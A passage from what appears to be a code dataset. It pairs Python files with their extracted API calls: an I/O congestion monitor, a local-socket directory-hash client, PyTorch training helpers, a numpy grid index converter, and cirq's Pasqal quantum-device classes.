delimiter=sep)\\n', (2895, 2928), True, 'import numpy as np\\n'), ((5482, 5501), 'pandas.DataFrame', 'pd.DataFrame', (['stats'], {}), '(stats)\\n', (5494, 5501), True, 'import pandas as pd\\n'), ((446, 467), 'src.si.util.util.label_gen', 'label_gen', (['X.shape[1]'], {}), '(X.shape[1])\\n', (455, 467), False, 'from src.si.util.util import label_gen\\n'), ((4202, 4229), 'numpy.mean', 'np.mean', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\\n', (4209, 4229), True, 'import numpy as np\\n'), ((4250, 4276), 'numpy.var', 'np.var', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\\n', (4256, 4276), True, 'import numpy as np\\n'), ((4297, 4323), 'numpy.max', 'np.max', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\\n', (4303, 4323), True, 'import numpy as np\\n'), ((4344, 4370), 'numpy.min', 'np.min', (['data[:, i]'], {'axis': '(0)'}), '(data[:, 
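The `summary()` helper in the record above collects mean/variance/max/min column by column in a Python loop. A small sketch of the same statistics computed with per-column reductions and assembled into the same DataFrame orientation; the toy data and column names are made up for illustration.

import numpy as np
import pandas as pd

data = np.array([[1.0, 10.0], [2.0, 20.0], [3.0, 30.0]])   # toy dataset
columns = ["x1", "x2"]                                      # illustrative names

stats = pd.DataFrame(
    {
        name: {
            "mean": data[:, i].mean(),
            "var": data[:, i].var(),
            "max": data[:, i].max(),
            "min": data[:, i].min(),
        }
        for i, name in enumerate(columns)
    }
)
print(stats)   # rows: mean/var/max/min, one column per feature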
i], axis=0)\\n', (4350, 4370), True, 'import numpy as np\\n'), ((4652, 4679), 'numpy.mean', 'np.mean', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\\n', (4659, 4679), True, 'import numpy as np\\n'), ((4700, 4726), 'numpy.var', 'np.var', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\\n', (4706, 4726), True, 'import numpy as np\\n'), ((4747, 4773), 'numpy.max', 'np.max', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\\n', (4753, 4773), True, 'import numpy as np\\n'), ((4794, 4820), 'numpy.min', 'np.min', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\\n', (4800, 4820), True, 'import numpy as np\\n'), ((2497, 2514), 'numpy.unique', 'np.unique', (['self.Y'], {}), '(self.Y)\\n', (2506, 2514), True, 'import numpy as np\\n')]"}}},{"rowIdx":741,"cells":{"code":{"kind":"string","value":"# vim: tabstop=4 shiftwidth=4 softtabstop=4\n#\n# Copyright (c) 2016 Wind River Systems, Inc.\n#\n# SPDX-License-Identifier: Apache-2.0\n#\n\nimport logging\nimport os\n\nfrom io_monitor.constants import DOMAIN\nfrom io_monitor.utils.data_window import DataCollectionWindow\n\nLOG = logging.getLogger(DOMAIN)\n\n\nclass DeviceDataCollector(object):\n # Moving average windows\n MA_WINDOW_SMA = 0\n MA_WINDOW_MED = 1\n MA_WINDOW_LAR = 2\n\n # Device status\n STATUS_NORMAL = \"N\"\n STATUS_BUILDING = \"B\"\n STATUS_CONGESTED = \"L\"\n\n # Data tracked\n DATA_IOPS = \"iops\"\n DATA_AWAIT = \"await\"\n\n def __init__(self, device_node, data_elements,\n size_sma, size_med, size_lar):\n\n self.node = device_node\n\n if os.path.exists('/sys/block/' + self.node + '/dm/name'):\n self.name = open('/sys/block/' + self.node + '/dm/name',\n 'r').read().rstrip()\n else:\n self.name = self.node\n\n self.data_dict = {}\n self.data_caps = {self.DATA_AWAIT: -1, self.DATA_IOPS: -1}\n self.timestamp = None\n\n self.congestion_status = self.STATUS_NORMAL\n self.congestion_await_minimal_spike = -1\n self.congestion_await_sustained = -1\n\n for element in data_elements:\n self.data_dict.update({element: [\n DataCollectionWindow(size_sma, stuck_data_override=True),\n DataCollectionWindow(size_med, stuck_data_override=True),\n DataCollectionWindow(size_lar, stuck_data_override=True)]})\n\n def update_congestion_status(self):\n # Bail if threshold is not set\n if self.congestion_await_sustained == -1:\n return\n\n ma_sma = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_SMA)\n ma_med = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_MED)\n ma_lar = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_LAR)\n\n # Set the congestion status based on await moving average\n if self.congestion_status is self.STATUS_NORMAL:\n if ma_sma > self.congestion_await_sustained:\n self.congestion_status = self.STATUS_BUILDING\n\n if self.congestion_status is self.STATUS_BUILDING:\n if ma_lar > self.congestion_await_sustained:\n self.congestion_status = self.STATUS_CONGESTED\n LOG.warn(\"Node %s (%s) is experiencing high await times.\"\n % (self.node, self.name))\n elif ma_sma < self.congestion_await_sustained:\n self.congestion_status = self.STATUS_NORMAL\n\n if self.congestion_status is self.STATUS_CONGESTED:\n if ma_med < self.congestion_await_sustained:\n self.congestion_status = self.STATUS_BUILDING\n\n def update_data(self, ts, element, value):\n self.timestamp = ts\n\n # LOG.debug(\"%s: e = %s, v= %f\" % (self.node, element, value))\n for w in [self.MA_WINDOW_SMA,\n self.MA_WINDOW_MED,\n self.MA_WINDOW_LAR]:\n self.data_dict[element][w].update(value, self.data_caps[element])\n\n def get_latest(self, element):\n if 
element not in self.data_dict:\n LOG.error(\"Error: invalid element requested = %s\" % element)\n return 0\n\n return self.data_dict[element][self.MA_WINDOW_SMA].get_latest()\n\n def get_average(self, element, window):\n if window not in [self.MA_WINDOW_SMA,\n self.MA_WINDOW_MED,\n self.MA_WINDOW_LAR]:\n LOG.error(\"WindowError: invalid window requested = %s\" % window)\n return 0\n\n if element not in self.data_dict:\n LOG.error(\"Error: invalid element requested = %s\" % element)\n return 0\n\n return self.data_dict[element][window].get_average()\n\n def is_data_stale(self, ts):\n return not (ts == self.timestamp)\n\n def get_congestion_status(self, debug=False):\n\n if debug:\n ma_sma = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_SMA)\n ma_med = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_MED)\n ma_lar = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_LAR)\n\n LOG.debug(\"%s [ %6.2f %6.2f %6.2f ] %d\" %\n (self.node, ma_sma, ma_med, ma_lar,\n self.congestion_await_sustained))\n\n return self.congestion_status\n\n def set_data_caps(self, element, cap):\n if element in self.data_caps:\n self.data_caps[element] = cap\n\n def set_congestion_thresholds(self, await_minimal_spike,\n await_sustained_congestion):\n self.congestion_await_minimal_spike = await_minimal_spike\n self.congestion_await_sustained = await_sustained_congestion\n\n def get_element_windows_avg_list(self, element):\n return [self.get_average(element, self.MA_WINDOW_SMA),\n self.get_average(element, self.MA_WINDOW_MED),\n self.get_average(element, self.MA_WINDOW_LAR)]\n\n def get_element_windows_avg_string(self, element):\n return \"%s [ %9.2f, %9.2f, %9.2f ]\" % (\n element,\n self.get_average(element, self.MA_WINDOW_SMA),\n self.get_average(element, self.MA_WINDOW_MED),\n self.get_average(element, self.MA_WINDOW_LAR))\n"},"apis":{"kind":"list like","value":["logging.getLogger","os.path.exists","io_monitor.utils.data_window.DataCollectionWindow"],"string":"[\n \"logging.getLogger\",\n \"os.path.exists\",\n \"io_monitor.utils.data_window.DataCollectionWindow\"\n]"},"extract_api":{"kind":"string","value":"[((270, 295), 'logging.getLogger', 'logging.getLogger', (['DOMAIN'], {}), '(DOMAIN)\\n', (287, 295), False, 'import logging\\n'), ((739, 793), 'os.path.exists', 'os.path.exists', ([\"('/sys/block/' + self.node + '/dm/name')\"], {}), \"('/sys/block/' + self.node + '/dm/name')\\n\", (753, 793), False, 'import os\\n'), ((1336, 1392), 'io_monitor.utils.data_window.DataCollectionWindow', 'DataCollectionWindow', (['size_sma'], {'stuck_data_override': '(True)'}), '(size_sma, stuck_data_override=True)\\n', (1356, 1392), False, 'from io_monitor.utils.data_window import DataCollectionWindow\\n'), ((1410, 1466), 'io_monitor.utils.data_window.DataCollectionWindow', 'DataCollectionWindow', (['size_med'], {'stuck_data_override': '(True)'}), '(size_med, stuck_data_override=True)\\n', (1430, 1466), False, 'from io_monitor.utils.data_window import DataCollectionWindow\\n'), ((1484, 1540), 'io_monitor.utils.data_window.DataCollectionWindow', 'DataCollectionWindow', (['size_lar'], {'stuck_data_override': '(True)'}), '(size_lar, stuck_data_override=True)\\n', (1504, 1540), False, 'from io_monitor.utils.data_window import DataCollectionWindow\\n')]"}}},{"rowIdx":742,"cells":{"code":{"kind":"string","value":"from net_common import *\nimport struct\nimport sys\n\ndef getDirHashOpts(withNames=False,\n ignoreThumbsFiles=True,\n ignoreUnixHiddenFiles=True,\n ignoreEmptyDirs=True):\n return bytearray([((1 if withNames else 0) +\n (2 if 
ignoreThumbsFiles else 0) +\n (4 if ignoreUnixHiddenFiles else 0) +\n (8 if ignoreEmptyDirs else 0))])\n\nif __name__ == \"__main__\":\n sock = get_connected_local_socket()\n\n path = encodeString('/dev/shm/exampleDir')\n # path = encodeString('/dev/null')\n sock.sendall(bytearray(b'\\x0A')) # HASH request\n # sock.sendall(bytearray(b'\\x01')) # choose MD5 algorithm\n sock.sendall(bytearray(b'\\x06')) # choose SHA3-224 algorithm\n sock.sendall(getDirHashOpts(withNames=True,ignoreUnixHiddenFiles=False)) # send dirHashOpts byte (unused for regular files)\n sock.sendall(struct.pack(\"@H\", len(path))) # len of path as unsigned short\n sock.sendall(path)\n\n resp = sock.recv(1) # response first byte: \\x00 OK or \\xFF ERROR\n\n if resp != b'\\x00':\n print(\"Error byte received, errno is:\", struct.unpack(\"@i\", sock.recv(4))[0])\n sys.exit(0)\n # print(toHex(sock.recv(16))) # 128 bit (16 byte) md5 digest size\n print(toHex(sock.recv(28))) # 224 bit (28 byte) sha3-224 digest size\n sock.close()\n"},"apis":{"kind":"list like","value":["sys.exit"],"string":"[\n \"sys.exit\"\n]"},"extract_api":{"kind":"string","value":"[((1201, 1212), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\\n', (1209, 1212), False, 'import sys\\n')]"}}},{"rowIdx":743,"cells":{"code":{"kind":"string","value":"'''Some helper functions for PyTorch, including:\r\n - progress_bar: progress bar mimic xlua.progress.\r\n - set_lr : set the learning rate\r\n - clip_gradient : clip gradient\r\n'''\r\n\r\nimport os\r\nimport sys\r\nimport time\r\nimport math\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.init as init\r\nfrom torch.autograd import Function\r\n\r\n#获取控制台行、列数\r\nif sys.platform == 'win32':\r\n\tterm_width = 80\r\nelse:\r\n\tprint('###', os.popen('stty size', 'r').read())\r\n\t_, term_width = os.popen('stty size', 'r').read().split()\r\n\tterm_width = int(term_width)\r\n\r\nTOTAL_BAR_LENGTH = 30.\r\nlast_time = time.time()\r\nbegin_time = last_time\r\n\r\n#[==>........ 19/225 ...........] 
| Loss: 1.961 | Acc: 22.000% (537/2432) \r\ndef progress_bar(current, total, msg=None):\r\n global last_time, begin_time\r\n if current == 0:\r\n begin_time = time.time() # Reset for new bar.\r\n\r\n cur_len = int(TOTAL_BAR_LENGTH*current/total)\r\n rest_len = int(TOTAL_BAR_LENGTH - cur_len) - 1\r\n\r\n sys.stdout.write(' [')\r\n for i in range(cur_len):\r\n sys.stdout.write('=')\r\n sys.stdout.write('>')\r\n for i in range(rest_len):\r\n sys.stdout.write('.')\r\n sys.stdout.write(']')\r\n\r\n cur_time = time.time()\r\n step_time = cur_time - last_time\r\n last_time = cur_time\r\n tot_time = cur_time - begin_time\r\n\r\n L = []\r\n if msg:\r\n L.append(' | ' + msg)\r\n\r\n msg = ''.join(L)\r\n sys.stdout.write(msg)\r\n for i in range(term_width-int(TOTAL_BAR_LENGTH)-len(msg)-3):\r\n sys.stdout.write(' ')\r\n\r\n # Go back to the center of the bar.\r\n for i in range(term_width-int(TOTAL_BAR_LENGTH/2)+2):\r\n sys.stdout.write('\\b')\r\n sys.stdout.write(' %d/%d ' % (current+1, total))\r\n\r\n if current < total-1:\r\n sys.stdout.write('\\r')\r\n else:\r\n sys.stdout.write('\\n')\r\n sys.stdout.flush()\r\n\r\ndef set_lr(optimizer, lr):\r\n for group in optimizer.param_groups:\r\n group['lr'] = lr\r\n\r\ndef clip_gradient(optimizer, grad_clip):\r\n for group in optimizer.param_groups:\r\n #print(group['params'])\r\n for param in group['params']:\r\n param.grad.data.clamp_(-grad_clip, grad_clip)\r\n"},"apis":{"kind":"list like","value":["sys.stdout.flush","os.popen","time.time","sys.stdout.write"],"string":"[\n \"sys.stdout.flush\",\n \"os.popen\",\n \"time.time\",\n \"sys.stdout.write\"\n]"},"extract_api":{"kind":"string","value":"[((587, 598), 'time.time', 'time.time', ([], {}), '()\\n', (596, 598), False, 'import time\\n'), ((971, 993), 'sys.stdout.write', 'sys.stdout.write', (['\"\"\" [\"\"\"'], {}), \"(' [')\\n\", (987, 993), False, 'import sys\\n'), ((1060, 1081), 'sys.stdout.write', 'sys.stdout.write', (['\"\"\">\"\"\"'], {}), \"('>')\\n\", (1076, 1081), False, 'import sys\\n'), ((1149, 1170), 'sys.stdout.write', 'sys.stdout.write', (['\"\"\"]\"\"\"'], {}), \"(']')\\n\", (1165, 1170), False, 'import sys\\n'), ((1189, 1200), 'time.time', 'time.time', ([], {}), '()\\n', (1198, 1200), False, 'import time\\n'), ((1390, 1411), 'sys.stdout.write', 'sys.stdout.write', (['msg'], {}), '(msg)\\n', (1406, 1411), False, 'import sys\\n'), ((1648, 1698), 'sys.stdout.write', 'sys.stdout.write', ([\"(' %d/%d ' % (current + 1, total))\"], {}), \"(' %d/%d ' % (current + 1, total))\\n\", (1664, 1698), False, 'import sys\\n'), ((1806, 1824), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\\n', (1822, 1824), False, 'import sys\\n'), ((825, 836), 'time.time', 'time.time', ([], {}), '()\\n', (834, 836), False, 'import time\\n'), ((1033, 1054), 'sys.stdout.write', 'sys.stdout.write', (['\"\"\"=\"\"\"'], {}), \"('=')\\n\", (1049, 1054), False, 'import sys\\n'), ((1122, 1143), 'sys.stdout.write', 'sys.stdout.write', (['\"\"\".\"\"\"'], {}), \"('.')\\n\", (1138, 1143), False, 'import sys\\n'), ((1487, 1508), 'sys.stdout.write', 'sys.stdout.write', (['\"\"\" \"\"\"'], {}), \"(' ')\\n\", (1503, 1508), False, 'import sys\\n'), ((1620, 1644), 'sys.stdout.write', 'sys.stdout.write', (['\"\"\"\\x08\"\"\"'], {}), \"('\\\\x08')\\n\", (1636, 1644), False, 'import sys\\n'), ((1735, 1757), 'sys.stdout.write', 'sys.stdout.write', ([\"'\\\\r'\"], {}), \"('\\\\r')\\n\", (1751, 1757), False, 'import sys\\n'), ((1778, 1800), 'sys.stdout.write', 'sys.stdout.write', (['\"\"\"\\n\"\"\"'], {}), \"('\\\\n')\\n\", (1794, 1800), 
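A side note on the terminal-width probe in the progress-bar record above: `os.popen('stty size')` only works on Unix-like systems, which is why the code special-cases win32 with a fixed width. Since Python 3.3 the standard library offers a portable alternative; a small sketch follows (the fallback size and the sample counters are arbitrary):

import shutil

# Portable console width with a sane fallback when not attached to a terminal.
term_width = shutil.get_terminal_size(fallback=(80, 24)).columns

# Minimal rendering of the same kind of bar the helper above draws.
bar_len, current, total = 30, 19, 225
filled = int(bar_len * current / total)
bar = "[" + "=" * filled + ">" + "." * (bar_len - filled - 1) + "]"
print(bar, "%d/%d" % (current + 1, total), "| terminal width:", term_width)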
False, 'import sys\\n'), ((422, 448), 'os.popen', 'os.popen', (['\"\"\"stty size\"\"\"', '\"\"\"r\"\"\"'], {}), \"('stty size', 'r')\\n\", (430, 448), False, 'import os\\n'), ((475, 501), 'os.popen', 'os.popen', (['\"\"\"stty size\"\"\"', '\"\"\"r\"\"\"'], {}), \"('stty size', 'r')\\n\", (483, 501), False, 'import os\\n')]"}}},{"rowIdx":744,"cells":{"code":{"kind":"string","value":"from __future__ import absolute_import, division, print_function\n\nimport logging\nimport sys\n\nlogging.basicConfig(\n stream=sys.stdout,\n level=logging.DEBUG,\n format='%(asctime)s %(name)s-%(levelname)s: %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S')\nimport numpy as np\nimport utils\nlogger = logging.getLogger(\"indexconverter\")\n\n\nclass IndexConverter(object):\n def __init__(self, ndim, ngrid):\n self.ndim = ndim\n self.ngrid = ngrid\n self._modulus = [(ngrid - 1) ** (ndim - j - 1) for j in range(ndim)]\n self._zerodim = np.zeros((self.ndim,))\n self.nbins = int(np.rint((ngrid - 1) ** ndim))\n\n def convert_to_vector(self, grid):\n if grid.shape[0] != self.ngrid - 1:\n raise Exception(\"Wrong dimension of grid. Expect length fo %s got %s\" % (self.ngrid - 1, grid.shape[0]))\n vector = np.empty((self.nbins,))\n for bin_idx in range(self.nbins):\n vector[bin_idx] = grid[tuple(self.convert_to_grid_idx(bin_idx))]\n return vector\n\n def convert_to_grid(self, vector):\n grid_shape = tuple(np.zeros(self.ndim).astype(int) + (self.ngrid - 1))\n if len(vector.shape) > 1:\n grids = np.empty((len(vector),) + grid_shape)\n for idx, v in enumerate(vector):\n grids[idx] = self.convert_to_grid(v)\n return grids\n else:\n grid = np.zeros(grid_shape)\n for idx in range(len(vector)):\n grid[tuple(self.convert_to_grid_idx(idx))] = vector[idx]\n return grid\n\n def convert_to_grid_idx(self, bin_idx):\n if bin_idx >= self.nbins or bin_idx < 0:\n print(self.nbins, self.ndim, self.nbins ** self.ndim)\n raise Exception(\"Invalid index %s. You are probably outside the grid...\" % bin_idx)\n grid_idx = ((self._zerodim + bin_idx) / self._modulus) % (self.ngrid - 1)\n return grid_idx.astype(int)\n\n def convert_to_bin_idx(self, grid_idx):\n bin_idx = utils.rint(np.sum(grid_idx * self._modulus))\n if bin_idx >= self.nbins or bin_idx < 0:\n raise Exception(\n \"Invalid bin index %s. You are probably outside the grid. 
Size:%s\" % (bin_idx, self.nbins))\n return bin_idx\n"},"apis":{"kind":"list like","value":["logging.basicConfig","logging.getLogger","numpy.sum","numpy.zeros","numpy.empty","numpy.rint"],"string":"[\n \"logging.basicConfig\",\n \"logging.getLogger\",\n \"numpy.sum\",\n \"numpy.zeros\",\n \"numpy.empty\",\n \"numpy.rint\"\n]"},"extract_api":{"kind":"string","value":"[((93, 249), 'logging.basicConfig', 'logging.basicConfig', ([], {'stream': 'sys.stdout', 'level': 'logging.DEBUG', 'format': '\"\"\"%(asctime)s %(name)s-%(levelname)s: %(message)s\"\"\"', 'datefmt': '\"\"\"%Y-%m-%d %H:%M:%S\"\"\"'}), \"(stream=sys.stdout, level=logging.DEBUG, format=\\n '%(asctime)s %(name)s-%(levelname)s: %(message)s', datefmt=\\n '%Y-%m-%d %H:%M:%S')\\n\", (112, 249), False, 'import logging\\n'), ((298, 333), 'logging.getLogger', 'logging.getLogger', (['\"\"\"indexconverter\"\"\"'], {}), \"('indexconverter')\\n\", (315, 333), False, 'import logging\\n'), ((556, 578), 'numpy.zeros', 'np.zeros', (['(self.ndim,)'], {}), '((self.ndim,))\\n', (564, 578), True, 'import numpy as np\\n'), ((852, 875), 'numpy.empty', 'np.empty', (['(self.nbins,)'], {}), '((self.nbins,))\\n', (860, 875), True, 'import numpy as np\\n'), ((604, 632), 'numpy.rint', 'np.rint', (['((ngrid - 1) ** ndim)'], {}), '((ngrid - 1) ** ndim)\\n', (611, 632), True, 'import numpy as np\\n'), ((1384, 1404), 'numpy.zeros', 'np.zeros', (['grid_shape'], {}), '(grid_shape)\\n', (1392, 1404), True, 'import numpy as np\\n'), ((1993, 2025), 'numpy.sum', 'np.sum', (['(grid_idx * self._modulus)'], {}), '(grid_idx * self._modulus)\\n', (1999, 2025), True, 'import numpy as np\\n'), ((1084, 1103), 'numpy.zeros', 'np.zeros', (['self.ndim'], {}), '(self.ndim)\\n', (1092, 1103), True, 'import numpy as np\\n')]"}}},{"rowIdx":745,"cells":{"code":{"kind":"string","value":"# Copyright 2020 The Cirq Developers\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom typing import FrozenSet, Callable, List, Sequence, Any, Union, Dict\nimport numpy as np\nimport networkx as nx\n\nimport cirq\nfrom cirq import _compat, GridQubit, LineQubit\nfrom cirq.ops import NamedQubit\nfrom cirq_pasqal import ThreeDQubit, TwoDQubit, PasqalGateset\n\n\n@cirq.value.value_equality\nclass PasqalDevice(cirq.devices.Device):\n \"\"\"A generic Pasqal device.\n\n The most general of Pasqal devices, enforcing only restrictions expected to\n be shared by all future devices. Serves as the parent class of all Pasqal\n devices, but can also be used on its own for hosting a nearly unconstrained\n device. 
When used as a circuit's device, the qubits have to be of the type\n cirq.NamedQubit and assumed to be all connected, the idea behind it being\n that after submission, all optimization and transpilation necessary for its\n execution on the specified device are handled internally by Pasqal.\n \"\"\"\n\n def __init__(self, qubits: Sequence[cirq.Qid]) -> None:\n \"\"\"Initializes a device with some qubits.\n\n Args:\n qubits (NamedQubit): Qubits on the device, exclusively unrelated to\n a physical position.\n Raises:\n TypeError: If the wrong qubit type is provided.\n ValueError: If the number of qubits is greater than the devices maximum.\n\n \"\"\"\n if len(qubits) > 0:\n q_type = type(qubits[0])\n\n for q in qubits:\n if not isinstance(q, self.supported_qubit_type):\n raise TypeError(\n 'Unsupported qubit type: {!r}. This device '\n 'supports qubit types: {}'.format(q, self.supported_qubit_type)\n )\n if not type(q) is q_type:\n raise TypeError(\"All qubits must be of same type.\")\n\n if len(qubits) > self.maximum_qubit_number:\n raise ValueError(\n 'Too many qubits. {} accepts at most {} '\n 'qubits.'.format(type(self), self.maximum_qubit_number)\n )\n\n self.gateset = PasqalGateset()\n self.qubits = qubits\n self._metadata = cirq.DeviceMetadata(\n qubits, nx.from_edgelist([(a, b) for a in qubits for b in qubits if a != b])\n )\n\n # pylint: enable=missing-raises-doc\n @property\n def supported_qubit_type(self):\n return (NamedQubit,)\n\n @property\n def maximum_qubit_number(self):\n return 100\n\n @property\n def metadata(self):\n return self._metadata\n\n @_compat.deprecated(fix='Use metadata.qubit_set() if applicable.', deadline='v0.15')\n def qubit_set(self) -> FrozenSet[cirq.Qid]:\n return frozenset(self.qubits)\n\n def qubit_list(self):\n return [qubit for qubit in self.qubits]\n\n def is_pasqal_device_op(self, op: cirq.Operation) -> bool:\n if not isinstance(op, cirq.Operation):\n raise ValueError('Got unknown operation:', op)\n return op in self.gateset\n\n def validate_operation(self, operation: cirq.Operation):\n \"\"\"Raises an error if the given operation is invalid on this device.\n\n Args:\n operation: The operation to validate.\n\n Raises:\n ValueError: If the operation is not valid.\n NotImplementedError: If the operation is a measurement with an invert\n mask.\n \"\"\"\n\n if not isinstance(operation, cirq.GateOperation):\n raise ValueError(\"Unsupported operation\")\n\n if not self.is_pasqal_device_op(operation):\n raise ValueError(f'{operation.gate!r} is not a supported gate')\n\n for qub in operation.qubits:\n if not isinstance(qub, self.supported_qubit_type):\n raise ValueError(\n '{} is not a valid qubit for gate {!r}. 
This '\n 'device accepts gates on qubits of type: '\n '{}'.format(qub, operation.gate, self.supported_qubit_type)\n )\n if qub not in self.metadata.qubit_set:\n raise ValueError(f'{qub} is not part of the device.')\n\n if isinstance(operation.gate, cirq.MeasurementGate):\n if operation.gate.invert_mask != ():\n raise NotImplementedError(\n \"Measurements on Pasqal devices don't support invert_mask.\"\n )\n\n def validate_circuit(self, circuit: 'cirq.AbstractCircuit') -> None:\n \"\"\"Raises an error if the given circuit is invalid on this device.\n\n A circuit is invalid if any of its moments are invalid or if there\n is a non-empty moment after a moment with a measurement.\n\n Args:\n circuit: The circuit to validate\n\n Raises:\n ValueError: If the given circuit can't be run on this device\n \"\"\"\n super().validate_circuit(circuit)\n\n # Measurements must be in the last non-empty moment\n has_measurement_occurred = False\n for moment in circuit:\n if has_measurement_occurred:\n if len(moment.operations) > 0:\n raise ValueError(\"Non-empty moment after measurement\")\n for operation in moment.operations:\n if isinstance(operation.gate, cirq.MeasurementGate):\n has_measurement_occurred = True\n\n def __repr__(self):\n return f'pasqal.PasqalDevice(qubits={sorted(self.qubits)!r})'\n\n def _value_equality_values_(self):\n return self.qubits\n\n def _json_dict_(self):\n return cirq.protocols.obj_to_dict_helper(self, ['qubits'])\n\n\nclass PasqalVirtualDevice(PasqalDevice):\n \"\"\"A Pasqal virtual device with qubits in 3d.\n\n A virtual representation of a Pasqal device, enforcing the constraints\n typically found in a physical device. The qubits can be positioned in 3d\n space, although 2d layouts will be supported sooner and are thus\n recommended. Only accepts qubits with physical placement.\n \"\"\"\n\n def __init__(\n self, control_radius: float, qubits: Sequence[Union[ThreeDQubit, GridQubit, LineQubit]]\n ) -> None:\n \"\"\"Initializes a device with some qubits.\n\n Args:\n control_radius: the maximum distance between qubits for a controlled\n gate. 
Distance is measured in units of the coordinates passed\n into the qubit constructor.\n qubits: Qubits on the device, identified by their x, y, z position.\n Must be of type ThreeDQubit, TwoDQubit, LineQubit or GridQubit.\n\n Raises:\n ValueError: if the wrong qubit type is provided or if invalid\n parameter is provided for control_radius.\"\"\"\n\n super().__init__(qubits)\n\n if not control_radius >= 0:\n raise ValueError('Control_radius needs to be a non-negative float.')\n\n if len(self.qubits) > 1:\n if control_radius > 3.0 * self.minimal_distance():\n raise ValueError(\n 'Control_radius cannot be larger than 3 times'\n ' the minimal distance between qubits.'\n )\n self.control_radius = control_radius\n self.gateset = PasqalGateset(include_additional_controlled_ops=False)\n self.controlled_gateset = cirq.Gateset(cirq.AnyIntegerPowerGateFamily(cirq.CZPowGate))\n\n @property\n def supported_qubit_type(self):\n return (ThreeDQubit, TwoDQubit, GridQubit, LineQubit)\n\n def validate_operation(self, operation: cirq.Operation):\n \"\"\"Raises an error if the given operation is invalid on this device.\n\n Args:\n operation: the operation to validate\n Raises:\n ValueError: If the operation is not valid\n \"\"\"\n super().validate_operation(operation)\n\n # Verify that a controlled gate operation is valid\n if operation in self.controlled_gateset:\n for p in operation.qubits:\n for q in operation.qubits:\n if self.distance(p, q) > self.control_radius:\n raise ValueError(f\"Qubits {p!r}, {q!r} are too far away\")\n\n def validate_moment(self, moment: cirq.Moment):\n \"\"\"Raises an error if the given moment is invalid on this device.\n\n Args:\n moment: The moment to validate.\n Raises:\n ValueError: If the given moment is invalid.\n \"\"\"\n\n super().validate_moment(moment)\n if len(moment) > 1:\n for operation in moment:\n if not isinstance(operation.gate, cirq.MeasurementGate):\n raise ValueError(\"Cannot do simultaneous gates. 
Use cirq.InsertStrategy.NEW.\")\n\n def minimal_distance(self) -> float:\n \"\"\"Returns the minimal distance between two qubits in qubits.\n\n Args:\n qubits: qubit involved in the distance computation\n\n Raises:\n ValueError: If the device has only one qubit\n\n Returns:\n The minimal distance between qubits, in spacial coordinate units.\n \"\"\"\n if len(self.qubits) <= 1:\n raise ValueError(\"Two qubits to compute a minimal distance.\")\n\n return min([self.distance(q1, q2) for q1 in self.qubits for q2 in self.qubits if q1 != q2])\n\n def distance(self, p: Any, q: Any) -> float:\n \"\"\"Returns the distance between two qubits.\n\n Args:\n p: qubit involved in the distance computation\n q: qubit involved in the distance computation\n\n Raises:\n ValueError: If p or q not part of the device\n\n Returns:\n The distance between qubits p and q.\n \"\"\"\n all_qubits = self.qubit_list()\n if p not in all_qubits or q not in all_qubits:\n raise ValueError(\"Qubit not part of the device.\")\n\n if isinstance(p, GridQubit):\n return np.sqrt((p.row - q.row) ** 2 + (p.col - q.col) ** 2)\n\n if isinstance(p, LineQubit):\n return abs(p.x - q.x)\n\n return np.sqrt((p.x - q.x) ** 2 + (p.y - q.y) ** 2 + (p.z - q.z) ** 2)\n\n def __repr__(self):\n return ('pasqal.PasqalVirtualDevice(control_radius={!r}, qubits={!r})').format(\n self.control_radius, sorted(self.qubits)\n )\n\n def _value_equality_values_(self) -> Any:\n return (self.control_radius, self.qubits)\n\n def _json_dict_(self) -> Dict[str, Any]:\n return cirq.protocols.obj_to_dict_helper(self, ['control_radius', 'qubits'])\n\n\n@_compat.deprecated_class(\n deadline='v0.16', fix='Use cirq.optimize_for_target_gateset(circuit, gateset=PasqalGateset()).'\n)\nclass PasqalConverter(cirq.neutral_atoms.ConvertToNeutralAtomGates):\n \"\"\"A gate converter for compatibility with Pasqal processors.\n\n Modified version of ConvertToNeutralAtomGates, where a new 'convert' method\n 'pasqal_convert' takes the 'keep' function as an input.\n \"\"\"\n\n def pasqal_convert(\n self, op: cirq.Operation, keep: Callable[[cirq.Operation], bool]\n ) -> List[cirq.Operation]:\n def on_stuck_raise(bad):\n return TypeError(\n \"Don't know how to work with {!r}. 
